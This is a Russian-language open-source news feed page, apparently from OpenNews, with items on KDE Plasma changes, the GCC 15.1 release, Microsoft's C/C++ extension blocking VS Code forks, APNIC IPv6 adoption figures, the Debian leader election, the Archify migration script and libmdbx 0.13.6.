  • Улучшена поддержка Wayland. В композитном менеджере KWin задействована стабильная версия Wayland-протокола ext-data-control, необходимого для корректной работы с буфером обмена (ранее использовался протокол wlr-data-control-unstable-v1). В окружении на базе Wayland добавлена возможность использования относительного позиционирования на графических планшетах, при котором позиция стилуса определяется относительно предыдущего положения, а не абсолютной позиции на поверхности планшета. Для работы с Wayland адаптирована возможность управления графическим курсором при помощи клавиатуры.
  • В меню приложений Kickoff добавлены метки для недавно установленных программ.
  • Добавлено предупреждение, выводимое при попытке обращения к микрофону из приложения, если микрофон переведён в настройках в беззвучный режим.
  • В KMenuEdit добавлена возможность настройки постоянного запуска выбранных приложений на дискретном GPU.
  • В конфигуратор добавлен новый раздел "Анимация", в который перенесены настройки анимированных эффектов. В секции "Десктоп-эффекты" оставлены общие эффекты, не связанные с визуализацией перехода из одного состояния в другое.
  • Изменена обработка уведомлений во время открытия приложений в полноэкранном режиме. Вместо игнорирования некритичных уведомлений при работе с полноэкранными программами теперь автоматически включается режим "не беспокоить". Отличия в том, что после выхода из полноэкранного режима будет показано предупреждение о наличии пропущенных уведомлений. При желании новое поведение можно отключить в настройках.
  • В системном лотке теперь показывается информация о ненастроенном виджете с прогнозом погоды.
  • В диалоге настройки панели две отдельные кнопки в заголовке преобразованы в меню, что решило проблему с растяжением диалога на системах с локализацией из-за слишком длинных слов на кнопках.
  • На странице управления пользователями реализовано предупреждение, показываемое при попытке удаления пользователя с активным сеансом. При подтверждении подобной операции файлы такого пользователя не будут удалены.
  • В настройки системного лотка добавлено предупреждение, выводимое при попытке отключить сервис управления буфером обмена.
  • Модернизировано оформление диалогов для настройки виджетов часов, словаря, таймера и показа слайд-шоу из выбранных изображений.
  • Увеличен отступ между кнопками "Настроить" и "Закрепить" в окне виджета "Цифровые часы".
  • В Discover добавлена поддержка использования поисковой системы, указанной в системных настройках (раньше всегда использовался DuckDuckGo).
  • В виджет управления воспроизведением (Media Controller) добавлена поддержка комбинаций клавиш Ctrl+Tab и Alt+[number] для переключения между вкладками и источниками.
  • В Spectacle добавлена индикация обработки данных после завершения записи скринкаста (до этого создавалось ощущение зависания приложения).
  • Исправлена ошибка, из-за которой в глобальном меню временами показывалось меню не того приложения.
  • Устранено аварийное завершение KWin при отключении ноутбука от некоторых dock-станций.
  • Устранены аварийные завершения менеджера приложений Discover.

  1. Главная ссылка к новости
  2. OpenNews: Выпуск KDE Gear 25.04, набора приложений от проекта KDE
  3. OpenNews: В KDE реализована начальная поддержка восстановления сеансов на базе Wayland
  4. OpenNews: В KDE добавлена поддержка Wayland-протокола fifo и улучшена настройка дисплеев
  5. OpenNews: Для KDE разрабатывают новый менеджер входа для замены SDDM
  6. OpenNews: Перегрузка инфраструктуры KDE, GNOME, Fedora, Codeberg и SourceHut из-за ИИ-индексаторов
Обсуждение (237 +22) | Тип: Обобщение |


·25.04 Релиз набора компиляторов GCC 15 (259 +34)
  После года разработки опубликован релиз свободного набора компиляторов GCC 15.1, первый значительный выпуск в новой ветке GCC 15.x. В соответствии со схемой нумерации выпусков, версия 15.0 использовалась в процессе разработки, а незадолго до выхода GCC 15.1 уже ответвилась ветка GCC 16.0, на базе которой будет сформирован следующий значительный релиз GCC 16.1.

Основные изменения:

  • При компиляции программ на языке C по умолчанию задействован стандарт С23 (обзор изменений) с расширениями GNU ("-std=gnu23"). Ранее по умолчанию использовался стандарт C17 - "-std=gnu17"). Изменение потенциально может привести к проблемам при сборке существующих проектов из-за включения константы nullptr, типа _BitInt(n) и ключевых слов bool, true и false, которые могут конфликтовать с заданными в приложениях одноимёнными идентификаторами.
  • Реализованы возможности стандарта C23:
    • Директива "#embed", предназначенная для встраивания в код бинарных ресурсов.
    • Атрибут "unsequenced", сигнализирующий, что результат не зависит от порядка выполнения.
    • Атрибут "reproducible", указывающий, что функция всегда возвращает один и тот же результат при одинаковых входных данных, т.е. не зависит от иных факторов.
  • Реализованы элементы будущего стандарта C2Y (-std=c2y и -std=gnu2y):
    • Возможность объявления переменных в операторе "if", например, "if (int x = get ()) {...}".
    • Поддержка присвоения имён циклам для того, чтобы ссылаться на них в коде.
      
         outer: for (int i = 0; i < IK; ++ i) {
           switch (i) {
             case 1:
               break;       // jumps to CONT1
             case 2:
               break outer; // jumps to CONT2
           }
           // CONT1
         }
         // CONT2
      
      
    • Поддержка указания диапазонов целых значений в выражениях "case", например, "case 1 ... 10:".
    • Суффиксы "i" и "j" для обозначения мнимой части в комплексных числах.
    • Возможность использования операторов "++" и "--" с комплексными числами.
    • Конструкция "_Generic(type, expr1, expr2, ...)" для выбора выражения на основе типа операнда.
    • Поддержка обращения к байтовым массивам как к другим типам объектов, таким как структуры и объединения.
    • Поддержка применения оператора "alignof" к неполным массивам (объявленным без указания размера, например, "int a[]").
    • Добавлен новый синтаксис для восьмеричных, шестнадцатеричных и универсальных escape-последовательностей символов. Вместо "\u", "\x" и "\nnn" - предложены последовательности "\u{}", "\o{}" и "\x{}", в которых можно указывать произвольное число цифр.
    • Встроенные функции "__builtin_stdc_rotate_left" и "__builtin_stdc_rotate_right".
    • Разрешены операции с нулевой длиной на указателях NULL (например, "sizeof(*p)").
  • В фронтэнде для языка C++ реализованы возможности, развиваемые для будущего стандарта C++26:
    • Вариативный оператор "friend" ("friend Ts...").
    • Возможность использования ключевого слова "constexpr" с разновидностью оператора "new" (placement new) для размещения объекта в заранее выделенной памяти во время компиляции.
    • Вывод ошибки при удалении указателя на неполный тип.
    • Объявлен устаревшим синтаксис определения вариативных параметров с многоточием без предшествующей запятой (например, когда указывается "void e(int...)" вместо "void e(int, ...)").
    • Индексирование пакета параметров в шаблонах.
    • Атрибуты для структурированных привязок;
    • Синтаксис '= delete("причина")';
    • Включение "@", "$" и "`" в базовый набор символов.
    • Запрещено использование макросов для объявления модулей.
    • Возможность применения структурированного связывания (structured binding) в качестве условия в операторах if и switch.
    • Прекращена поддержка прямого сравнения массивов (например, "int arr1[5]; int arr2[5]; bool same = arr1 == arr2").
    • Механизм "#embed" для встраивания бинарных ресурсов.
    • Объявлен устаревшим шаблонный класс is_trivial.
  • Добавлены возможности C++23:
    • Запрет некоторых применений директивы "export" и разрешение использования "export {}".
    • Поддержка продления времени жизни временных объектов в циклах "for", перебирающих диапазоны.
  • В библиотеке libstdc++ реализована экспериментальная поддержка модулей std и std.compat.
  • Использование инициализатора "{0}" для объединений в коде на C и C++ теперь не гарантирует очистку всего содержимого, а приводит к обнулению первого элемента объединения. Для очистки всего объединения следует использовать выражение "{}", определённое в спецификации C23, или указать опцию "-fzero-init-padding-bits=unions" для восстановления старого поведения.
  • Реализована поддержка атрибута "musttail" ([[gnu::musttail]] и [[clang::musttail]]) для гарантированных хвостовых вызовов. Атрибут применяется к выражениям return, в которых осуществляется рекурсивный вызов текущей функции, и гарантирует, что такой вызов будет использовать хвостовую рекурсию, при которой не выделяется дополнительная память в стеке (исключает риск исчерпания памяти при очень большом числе вызовов).
  • Реализована поддержка атрибута flag_enum ([[gnu::flag_enum]] и [[clang::flag_enum]]), применяемого к перечислениям для индикации, что содержимое используются в битовых операциях (исключает вывод предупреждения в режиме "-Wswitch").
  • Добавлена поддержка атрибута "counted_by", через который можно указать поле в структуре с гибким массивом, определяющим число элементов. Атрибут может использоваться для повышения эффективности проверок выхода за границу буфера.
  • Для функций добавлен атрибут "nonnull_if_nonzero", определяющий, что некоторые параметры функции с указателями могут принимать значение NULL, только если другой параметр равен нулю.
  • Разрешено использовать расширенные ассемблерные вставки "asm (....)" вне функций. В ассемблерных вставках разрешено перезаписывать память в красной зоне стека (область на вершине стека).
  • Компиляция кода на C++ ускорена благодаря улучшенному хэшированию шаблонов.
  • Добавлены новые оптимизации. Реализована поддержка векторизации циклов, в которых имеется код для преждевременного выхода (например, через вызов break или return), даже если подобные циклы манипулируют динамически выделяемыми массивами или буферами, размер которых неизвестен на этапе компиляции. При указании опции "-O2" включена векторизация некоторых легко векторизируемых циклов, для которых отсутствуют сведения о количестве итераций (tripcount).
  • Добавлен режим инкрементальной оптимизации на этапе связывания (LTO, Link-Time Optimization), существенно сокращающий время перекомпиляции при использовании LTO в ситуациях, когда внесены незначительные изменения в код (отредактирована одна функция). Для включения инкрементального режима предложена опция "-flto-incremental".
  • Улучшена компиляция очень больших входных файлов. Реализовано отслеживание номеров столбцов, превышающих 4096. Повышена точность указания местоположения ошибок и предупреждений в очень больших файлах.
  • В статическом анализаторе повышена наглядность отчётов при диагностике проблем. Например, обеспечено выделение места возникновения проблемы символом "⚠️", изменена компоновка вывода при ошибках в шаблонах C++, добавлены подсказки для упрощения перехода на стандарт C23, переработана цветовая схема. Добавлена возможность вывода диагностики в формате Sarif (-fdiagnostics-format=sarif-file).
  • Реализована библиотека libgdiagnostics, позволяющая интегрировать в свои проекты возможности GCC, связанные с оформление диагностических сообщений (например, можно задействовать средства цитирования, подсветки, подсказок по исправлению, вывода в формате SARIF).
  • Добавлена утилита sarif-replay для просмотра файлов в формате SARIF, основанном на JSON и применяемом для сохранения результатов статического анализа и сведений о предупреждениях и ошибках.
  • Добавлено предупреждение "-Wanalyzer-undefined-behavior-ptrdiff", выводимое при наличии операций вычитания с указателями, ссылающимися на разные участки памяти.
  • Добавлены предупреждения "-Wtrailing-whitespace" и "-Wleading-whitespace" для выявления остаточных пробелов в конце строк и лишних пробелов начале строк.
  • Добавлено предупреждение "-Wheader-guard" для информирования о проблемах в макросах защиты заголовочных файлов, предотвращающих повторное включение заголовочного файла.
  • Фронтэнд для языка D обновлён до версии 2.111.0.
  • Во фронтэнд для языка Fortran добавлена поддержка беззнаковых целых чисел.
  • В состав включён компилятор для языка COBOL - gcobol, поддерживающий платформы x86-64 и AArch64, и не рассчитанный на использование на 32-разрядных системах. Компилятор реализует спецификацию ISO/IEC 1989:2023 и проходит большую часть тестов NIST CCVS/85.
  • Продолжена реализация стандартов OpenMP 5.0, 5.1, 5.2 и 6.0 (Open Multi-Processing), определяющих API и способы применения методов параллельного программирования на многоядерных и гибридных (CPU+GPU/DSP) системах с общей памятью и блоками векторизации (SIMD). Добавлена поддержка метадиректив и конструкций tile, unroll, interop и dispatch. Для некоторых GPU AMD и NVIDIA добавлена поддержка унифицированной разделяемой памяти (включается через указание unified_shared_memory в директиве "requires"). Добавлена поддержка выражения "self_maps".
  • В бэкенд для архитектуры AArch64 добавлена поддержка платформы MinGW (aarch64-w64-mingw32). Реализовано более 20 расширений ARM8 и улучшена поддержка расширения ACLE (Arm C Language Extensions). Внесены многочисленные улучшения в генератор кода. Добавлена поддержка CPU:
    • Apple A12 (apple-a12)
    • Apple M1 (apple-m1)
    • Apple M2 (apple-m2)
    • Apple M3 (apple-m3)
    • Arm Cortex-A520AE (cortex-a520ae)
    • Arm Cortex-A720AE (cortex-a720ae)
    • Arm Cortex-A725 (cortex-a725)
    • Arm Cortex-R82AE (cortex-r82ae)
    • Arm Cortex-X925 (cortex-x925)
    • Arm Neoverse N3 (neoverse-n3)
    • Arm Neoverse V3 (neoverse-v3)
    • Arm Neoverse V3AE (neoverse-v3ae)
    • FUJITSU-MONAKA (fujitsu-monaka)
    • NVIDIA Grace (grace)
    • NVIDIA Olympus (olympus)
    • Qualcomm Oryon-1 (oryon-1)
  • В бэкенде генерации кода для GPU AMD Radeon (GCN) реализована поддержка библиотеки libstdc++ и добавлена экспериментальная поддержка генерации кода для серий устройств gfx9-generic, gfx10-3-generic и gfx11-generic.
  • В бэкенд для архитектуры x86 добавлена поддержка расширений архитектуры набора команд Intel AVX10.2, AMX-AVX512, AMX-FP8, AMX-MOVRS, AMX-TF32, AMX-TRANSPOSE, MOVRS. Добавлена поддержка CPU Intel Diamond Rapids. Удалена поддержка оптимизаций и расширений для CPU Intel Xeon Phi Knights Landing и Knights Mill.
  • Расширены возможности бэкендов для платформ LoongArch и AVR.
  • Удалена поддержка целевой архитектуры nios2, применяемой в процессорах Nios II. Объявлена устаревшей и будет удалена в следующем значительном выпуске поддержка ABI ILP32 (-mabi=ilp32) в порте для AArch64.

  1. Главная ссылка к новости
  2. OpenNews: Релиз набора компиляторов LLVM 20
  3. OpenNews: На базе Clang для языка Си реализован режим проверки границ буферов
  4. OpenNews: Для GCC подготовлены патчи для сборки универсальных исполняемых файлов
  5. OpenNews: Релиз набора компиляторов GCC 14
  6. OpenNews: GCC 15 будет использовать стандарт C23 по умолчанию
Обсуждение (259 +34) | Тип: Программы | Интересно


·25.04 В Microsoft C/C++ Extension включена блокировка работы в форках VS Code (197 +21)
  Компания Microsoft внесла в бинарные сборки расширения Microsoft C/C++ Extension (ms-vscode.cpptools) изменение, блокирующее работу в форках открытого редактора кода VS Code (Visual Studio Code). Расширение является проприетарным и используется для добавления в VS Code поддержки языков C/C++. После обновления до версии 1.24.5 пользователи редакторов VS Codium и Cursor, основанных на коде VS Code, столкнулись с невозможностью дальнейшего использования дополнения от Microsoft.

Инициализация дополнения завершалась ошибкой, уведомляющей, что пакет Microsoft C/C++ Extension может быть использован только в Microsoft Visual Studio, Visual Studio for Mac, Visual Studio Code, Azure DevOps, Team Foundation Server и связанных с ними продуктах и сервисах Microsoft. Для возобновления работы с проектами на C/C++ пользователи вынуждены откатиться на более старую версию и отключить автоматическую установку дополнений в настройках.

До этого компания Microsoft ещё в сентябре 2020 года добавила лицензионное соглашение, запрещающее использовать бинарные сборки дополнения в сторонних продуктах. До сих пор данное требование оставалось формальностью и не приводило к блокировке. Кроме того, условия использования магазина дополнений к VS Code запрещали подключение из ответвлений, но разработчики форка Cursor использовали для обхода прокси.

Часть кода дополнения Microsoft C/C++ Extension остаётся под лицензией MIT, а ограничения касаются только расширенных бинарных сборок, распространяемых через магазин приложений Microsoft под отдельной проприетарной лицензией. Открытым являются только компонент на языке TypeScript, а образующий основную функциональность Runtime является проприетарным и поставляется в бинарном виде.

Разработчики проекта Cursor выпустили обновление, временно решающее проблему, а в дальнейшем решили отказаться от использования проприетарных дополнений Remote access, Pylance, C/C++ и C#. В состав следующей версии планируют включить развиваемые сообществом открытые альтернативные дополнения. Аналогичный переход на открытые аналоги планируют и разработчики проекта VS Codium.

  1. Главная ссылка к новости
  2. OpenNews: Microsoft по ошибке удалил дополнения к VSCode, насчитывающие 9 млн установок
  3. OpenNews: Проект VSCodium развивает полностью открытый вариант редактора Visual Studio Code
  4. OpenNews: Компания Microsoft открыла исходные тексты редактора Visual Studio Code
  5. OpenNews: Microsoft удалил функциональность Hot Reload из открытого .NET для поставки только в Visual Studio 2022
  6. OpenNews: Конфликт из-за отображения шапки Санта-Клауса в открытом редакторе кода Visual Studio Code
Обсуждение (197 +21) | Тип: К сведению |


·25.04 Охват IPv6 в Азиатско-Тихоокеанском регионе достиг 50% (366 +32)
  Регистратор APNIC (Asia Pacific Network Information Centre) объявил о достижении 50% охвата IPv6 в Азиатско-Тихоокеанском регионе. Рубеж достигнут спустя 25 лет после начала внедрения IPv6 организацией APNIC. Степень внедрения IPv6 у других регистраторов: ARIN (Северная Америка) - 52%, LACNIC (Латинская Америка) - 39%, RIPE (Европа, Ближний Восток и Центральная Азия) - 28%, AFRINIC (Африка) - 4%.

По странам наиболее высокий уровень внедрения IPv6 наблюдается в Индии (78.16%, 600 млн. пользователей), Вьетнаме (60%, 54 млн. пользователей), Японии (58.2%, 109 млн. пользователей) и Таиланде (50.62%, 45 млн. пользователей). По числу пользователей IPv6 лидирует Китай, в котором поддержка IPv6 выявлена у 810 млн. пользователей. В России уровень внедрения IPv6 оценивается в 10.63%, Грузии - 12.72%, Украине - 13.42%, Беларуси - 14.35%, Литве - 16.79%, Латвии - 28.52%, Казахстане - 21.76%, Эстонии - 47.62%, Венгрии - 53.6%, Израиле - 62.83%.

Общемировой охват пользователей IPv6 оценён в 40%. Доля пользователей IPv6 из Азиатско-Тихоокеанского региона от всех пользователей IPv6 оценивается в 64%. Для сравнения доля AFRINIC (Африка) от всех пользователей IPv6 - 0.9%, ARIN (Северная Америка) - 9.4%, LACNIC (Латинская Америка) - 10.7% и RIPE (Европа, Ближний Восток и Центральная Азия) - 16%. Доля Индии от всех пользователей IPv6 составляет 27%, а Китая - 22%.

Представленные показатели учитывают число пользователей, которые способны устанавливать соединения по IPv6, но не отражают то, какой протокол фактически используется в конфигурациях, имеющих как IPv6, так и IPv4 адреса. Если рассматривать пользователей предпочитающих IPv6 в системах с двойным стеком, то доля IPv6 в Азиатско-Тихоокеанском регионе составляет 47%, а во всём мире - 36%.

Данные получены на основе ежедневного сбора статистики о примерно 25 млн пользователях. Информация собирается в сотрудничестве с Google и Comcast путём размещения проверочных объявлений в рекламных сетях. При проверке предоставляется три варианта URL для загрузки контента - в первом используется хост, доступный только по IPv4, во втором - только по IPv6, а в третьем - IPv4 и IPv6. На основе запроса данных URL делается вывод о поддержке клиентом IPv6. Если при обращению к хосту, доступному одновременно по IPv4 и IPv6 используется IPv6, поддержка данного протокола у клиента считается предпочтительной.

  1. Главная ссылка к новости
  2. OpenNews: Оценка популярности IPv6 в трафике Cloudflare
  3. OpenNews: Утечка хэшей паролей Whois-сервиса интернет-регистратора APNIC
  4. OpenNews: В Facebook доля трафика IPv6 в США превысила 50%
  5. OpenNews: В Азии введен режим строгой экономии IPv4-адресов
  6. OpenNews: Выдан последний блок /8 IPv4 адресов
Обсуждение (366 +32) | Тип: Обобщение |


·25.04 Подведены итоги выборов лидера проекта Debian (105 +19)
  Объявлены результаты ежегодных выборов лидера проекта Debian. В голосовании приняли участие 387 разработчиков, что составляет 35.1% от всех участников, имеющих право голоса (в прошлом году явка составила 35.8%, в позапрошлом 28%, исторический максимум в 2000 году - 62.25%, минимум в 2016 году - 27.56%). В этом году в выборах участвовали четыре кандидата на пост лидера. Победу одержал Андреас Тилле (Andreas Tille), который был переизбран на второй срок.

Андреас Тилле 26 лет участвует в сопровождении пакетов для Debian и является автором проекта Debian Med, нацеленного на оптимизации дистрибутива для решения задач, связанных с медициной и биологическими исследованиями. Кроме разработки Андреас также занимается наставничеством, обучая новичков, желающих присоединиться к разработке. Андреас сопровождает 1627 пакетов и занимает первое место в проекте по числу загруженных пакетов.

На пост лидера также претендовали:

  • Джанфранко Костаманья (Gianfranco Costamagna) - является разработчиком Debian с 2015 года, а Ubuntu с 2016. Сопровождает 64 пакета, среди которых borgbackup, llvm-toolchain и boinc. На посту лидера намеревался укрепить сотрудничество между сообществами Debian и Ubuntu, оптимизировать процессы сопровождения и контроля за качеством пакетов, усилить поддержку архитектур riscv64 и loong64, провести работу по упрощению усложнённых процессов.
  • Шрути Чандран (Sruthi Chandran) - участница разработки Debian из Индии, подключившаяся к проекту в 2016 году и принимающая участие в поддержке 198 пакетов, среди которых пакеты c библиотеками для Ruby, Node.js и Go, а также пакеты со шрифтами. Планы на посту лидера касались поддержки разнообразия в сообществе.
  • Джулиан Андрес Клоде (Julian Andres Klode) - участвует в проекте с 2008 года и известен как основной сопровождающий пакетного менеджера APT. В репозитории сопровождает 19 пакетов, в числе которых apt, grub2, gnu-efi, keepassxc и packagekit. Трудоустроен в Canonical и вовлечён в разработку Ubuntu. На посту лидера намеревался сделать Debian более привлекательным для пользователей, перешедших из Ubuntu и других операционных систем. Также хотел реформировать управление проектом, создать консультативный совет DPL и передать ему полномочия, имевшиеся у лидера.

  1. Главная ссылка к новости
  2. OpenNews: Избран новый лидер проекта Debian
  3. OpenNews: Джонатан Картер в четвёртый раз переизбран на пост лидера проекта Debian
  4. OpenNews: Началось альфа-тестирование инсталлятора Debian 13
  5. OpenNews: Выпуск дистрибутива Debian 12.10. Первая стадия заморозки Debian 13
  6. OpenNews: В Live-образах Debian 12 реализована поддержка повторяемых сборок
Обсуждение (105 +19) | Тип: К сведению |


·24.04 Скрипт Archify для замены имеющегося дистрибутива на Arch Linux (71 +23)
  Доступна первая версия скрипта Archify, позволяющего перейти на Arch Linux с других дистрибутивов, сохраняя пользователей, содержимое каталога /home и точки монтирования. Archify является ответвлением скрипта TurboArch, расширяющим его функциональность.

Скрипт предоставляет следующие возможности конфигурации новой системы: сохранение пользователей или добавление единственного пользователя root с заданным паролем; установку окружений рабочего стола или оконных менеджеров, видеодрайвера и звукового сервера. После выбора этих параметров скрипт уточнит у пользователя желаемое имя хоста, часовой пояс, сортировку серверов пакетов Arch Linux (с помощью утилиты reflector), выполнение перехода в командную оболочку bash или перезагрузку.

Затем следует процесс установки с выбранными параметрами, не требующий ввода пользователя. Скрипт поэтапно устанавливает все необходимые компоненты, удаляя содержимое старой системы из каталогов /bin, /etc, /lib, /lib64, /sbin, /srv, /usr, /var. Для автоматизации параметры можно определить в файле config.default, при наличии которого Archify перейдёт сразу на стадию замены системы. Поддерживается работа с логическими томами LVM и шифрованием LUKS.

Системные требования:

  • 64-разрядное ядро Linux версии 3.2 и выше, подходящее для glibc версии 2.39 и выше.
  • bash версии 4 и выше.
  • grep, coreutil, util-linux.
  • wget или curl.
  • tar, zstd.
  • git (опционально, для клонирования репозитория, заменяется загрузкой вручную).

Поддерживаемые исходные дистрибутивы (использование на других возможно согласно системным требованиям):

  • Ubuntu
  • Debian
  • Fedora
  • Manjaro
  • ROSA
  • Astra
  • Slackware
  • Gentoo
  • OpenSUSE

  1. Главная ссылка к новости
  2. OpenNews: Проект по запуску программ FreeBSD в Linux
  3. OpenNews: Второй релиз проекта Depenguinator для замены Linux на FreeBSD
Обсуждение (71 +23) | Автор: ARPANETenjoyer | Тип: Программы |


·24.04 Выпуск встраиваемой СУБД libmdbx 0.13.6 (12 +9)
  Опубликован выпуск библиотеки libmdbx 0.13.6 (MDBX) с реализацией высокопроизводительной компактной встраиваемой базы данных класса ключ-значение. Код libmdbx распространяется под лицензией Apache 2.0. Поддерживаются все актуальные операционные системы и архитектуры, а также российский Эльбрус 2000. Для libmdbx предлагается развитое API для C++, а также поддерживаемые энтузиастами привязки к языкам Rust, Haskell, Python, NodeJS, Ruby, Go, Nim, Deno, Scala. Из проектов, использующих libmdbx, можно отметить Isar, Erigon и Reth, а также разработки компаний StarkWare и Positive Technologies.

Исторически libmdbx является глубокой переработкой СУБД LMDB и превосходит своего прародителя по надёжности, набору возможностей и производительности. В сравнении с LMDB, в libmdbx большое внимание уделяется качеству кода, стабильной работе API, тестированию и автоматическим проверкам. Поставляется утилита проверки целостности структуры БД с некоторыми возможностями восстановления. Технологически libmdbx предлагает ACID, строгую сериализацию изменений и неблокирующее чтение с линейным масштабированием по ядрам ЦПУ. Поддерживается автоуплотнение, автоматическое управление размером БД, оценка объёма выборок по диапазонам (range query estimation).

Основные изменения:

  • Изменение поведения: При невозможности отвязки курсора от его текущей транзакции функция mdbx_cursor_bind() теперь возвращает MDBX_EINVAL вместо MDBX_BAD_TXN.
  • Во избежание потенциальных проблем отключено использование copy_file_range() на ядрах Linux 5.3 - 5.18.
  • Вброс std::invalid_argument теперь производится явным сообщением MDBX_EINVAL.
  • Устранён регресс при использовании курсоров для DBI=0 (aka GC/FreeDB) в читающих транзакциях.
  • Устранён регресс в виде ошибки EAGAIN при копировании БД на NFS и CIFS/SMB.
  • При доработках/развитии API в функции копирования был добавлен захват файловой блокировки посредством как fcntl(), так и flock(). Однако, в зависимости от версии локального ядра, версии удалённого сервера NFS и опций монтирования, это могло приводить к возврату POSIX-ошибки EAGAIN (11 на большинстве платформ, включая Linux).
  • Устранена ошибка merge/rebase внутри mdbx_txn_release_all_cursors_ex(), что могло приводить к последующим неожиданным ошибкам MDBX_EBADSIGN и утечкам памяти.
  • Исправлена assert-проверка в пути завершения вложенных транзакций.
  • Устранена возможность возврата неожиданной ошибки MDBX_BUSY из mdbx_txn_lock(dont_wait=false).
  • Для совместимости с GCC 15.x в режиме C23 изменён порядок указания атрибутов функций.

  1. Главная ссылка к новости
  2. OpenNews: Выпуск встраиваемой СУБД libmdbx 0.13.3
  3. OpenNews: Релиз LDAP-сервера ReOpenLDAP 1.2.0
Обсуждение (12 +9) | Тип: Программы |


Следующая страница (раньше) >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2025 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру